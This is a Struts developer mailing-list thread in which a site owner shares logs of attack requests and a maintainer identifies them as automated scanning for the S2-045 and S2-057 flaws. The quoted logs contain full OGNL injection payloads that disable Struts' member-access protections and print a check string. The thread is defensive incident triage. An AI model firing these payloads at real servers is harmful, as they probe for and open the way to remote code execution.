struts-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Lukasz Lenart <lukaszlen...@apache.org>
Subject Re: Not seen this attempt before?
Date Tue, 22 Jan 2019 08:34:40 GMT
This looks like https://cwiki.apache.org/confluence/display/WW/S2-045
What version of Struts do you run?

Cheers
Lukasz

niedz., 20 sty 2019 o 19:11 Greg Huber <gregh3269@gmail.com> napisał(a):
>
> OK, thanks, good work!  Did return 500 so looks damage was done.
>
> from the logs
> 2019-01-18 18:13:33,218 WARN
> org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest
> JakartaMultiPartRequest:parse - Unable to parse request
> org.apache.commons.fileupload.InvalidFileNameException: Invalid file name:
> %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
> ).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class
> )).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest
> ()).(#res=@org.apache.struts2.ServletActionContext@getResponse
> ()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}\0b
>     at
> org.apache.commons.fileupload.util.Streams.checkFileName(Streams.java:187)
> ~[commons-fileupload-1.4.jar:1.4]
>     at
> org.apache.commons.fileupload.disk.DiskFileItem.getName(DiskFileItem.java:253)
> ~[commons-fileupload-1.4.jar:1.4]
> ....
> ....
> 2019-01-18 18:13:35,032 WARN
> org.apache.struts2.dispatcher.mapper.DefaultActionMapper
> DefaultActionMapper:cleanupMethodName -
> #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
> ,#req=@org.apache.struts2.ServletActionContext@getRequest
> (),#res=@org.apache.struts2.ServletActionContext@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#w.print(#parameters.web[0]),#w.print(#parameters.path[0]),#w.close(),1?#xx:#request.toString
> did not match allowed method names [a-zA-Z_]*[0-9]* - default method
> execute will be used!
>
> Cheers Greg
>
> On Sun, 20 Jan 2019 at 14:33, Lukasz Lenart <lukaszlenart@apache.org> wrote:
>
> > niedz., 20 sty 2019 o 13:02 Greg Huber <gregh3269@gmail.com> napisał(a):
> > >
> > > Any ideas?
> > >
> > > 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST
> > >
> > /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action
> > > HTTP/1.1" 500 1497 "-" "Auto Spider 1.0"
> > > 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action
> > HTTP/1.1"
> > > 200 2023 "-" "Auto Spider 1.0"
> >
> > I would say a robot is scanning Internet to find vulnerable sites and
> > looks like it addresses the latest vulnerability with namespace
> > evaluation
> > https://cwiki.apache.org/confluence/display/WW/S2-057
> >
> >
> > Regards
> > --
> > Łukasz
> > + 48 606 323 122 http://www.lenart.org.pl/
> >
> > ---------------------------------------------------------------------
> > To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
> > For additional commands, e-mail: dev-help@struts.apache.org
> >
> >

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
For additional commands, e-mail: dev-help@struts.apache.org


Mime
View raw message